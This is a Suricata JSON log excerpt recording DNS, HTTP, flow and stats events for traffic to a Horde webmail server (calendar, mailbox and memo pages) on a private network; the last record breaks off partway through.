{"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":109,"tx_id":0}} 
{"timestamp":"2020-02-29T00:12:51.118278+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38583,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:51.150847+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/redbox_spinner.gif","state":"CLOSED","stored":false,"size":6820,"tx_id":0}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:12:52.000314+0000","flow_id":872744524144809,"event_type":"flow","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.417961+0000","end":"2020-02-29T00:07:51.525948+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:53.000241+0000","flow_id":859382880918804,"event_type":"flow","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.908564+0000","end":"2020-02-29T00:07:52.016611+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:12:56.090899+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":492,"tx_id":0}} {"timestamp":"2020-02-29T00:12:56.254011+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":128,"tx_id":1}} 
{"timestamp":"2020-02-29T00:12:58.000240+0000","event_type":"stats","stats":{"uptime":14430,"capture":{"kernel_packets":135364,"kernel_drops":0},"decoder":{"pkts":135370,"bytes":93299408,"invalid":187,"ipv4":133875,"ipv6":8,"ethernet":135370,"raw":0,"null":0,"sll":0,"tcp":128583,"udp":5090,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2766,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2782,"synack":2773,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1805,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2325,"failed_udp":111},"tx":{"http":4657,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2405}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2370,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":58099,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:59.579081+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43294,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:13:03.000496+0000","flow_id":1012670264431159,"event_type":"flow","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:02.053815+0000","end":"2020-02-29T00:08:02.162101+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:04.756758+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":210,"tx_id":0}} 
{"timestamp":"2020-02-29T00:13:05.000299+0000","event_type":"stats","stats":{"uptime":14437,"capture":{"kernel_packets":135371,"kernel_drops":0},"decoder":{"pkts":135379,"bytes":93301537,"invalid":187,"ipv4":133884,"ipv6":8,"ethernet":135379,"raw":0,"null":0,"sll":0,"tcp":128590,"udp":5092,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2767,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2783,"synack":2774,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1806,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2326,"failed_udp":111},"tx":{"http":4658,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2406}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2371,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":1,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22477,"memcap_state":0,"memcap_global":0},"http":{"memuse":58179,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:07.308166+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64728,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:07.606223+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919}} 
{"timestamp":"2020-02-29T00:13:08.000485+0000","flow_id":299443715105269,"event_type":"flow","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":9,"bytes_toserver":1312,"bytes_toclient":3258,"start":"2020-02-29T00:11:48.188917+0000","end":"2020-02-29T00:11:58.329407+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:09.000397+0000","flow_id":739926956553289,"event_type":"flow","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:07.963657+0000","end":"2020-02-29T00:08:08.072093+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:09.001174+0000","flow_id":483732157340798,"event_type":"flow","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:07.957566+0000","end":"2020-02-29T00:08:08.066104+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:10.166487+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:13:10.177839+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54470,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.362060+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} 
{"timestamp":"2020-02-29T00:13:10.588089+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:13:10.603094+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12091,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.769376+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40263,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:13:11.001346+0000","flow_id":1075243643438853,"event_type":"flow","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:10.657157+0000","end":"2020-02-29T00:08:10.765374+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:11.031139+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088}} 
{"timestamp":"2020-02-29T00:13:12.000321+0000","event_type":"stats","stats":{"uptime":14444,"capture":{"kernel_packets":135387,"kernel_drops":0},"decoder":{"pkts":135402,"bytes":93311937,"invalid":187,"ipv4":133907,"ipv6":8,"ethernet":135402,"raw":0,"null":0,"sll":0,"tcp":128611,"udp":5094,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2768,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2784,"synack":2775,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1807,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2327,"failed_udp":111},"tx":{"http":4659,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2407}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2373,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22807,"memcap_state":0,"memcap_global":0},"http":{"memuse":125920,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:12.002010+0000","flow_id":417014135629625,"event_type":"flow","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:11.108345+0000","end":"2020-02-29T00:08:11.216826+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:12.019322+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64358,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:12.184452+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 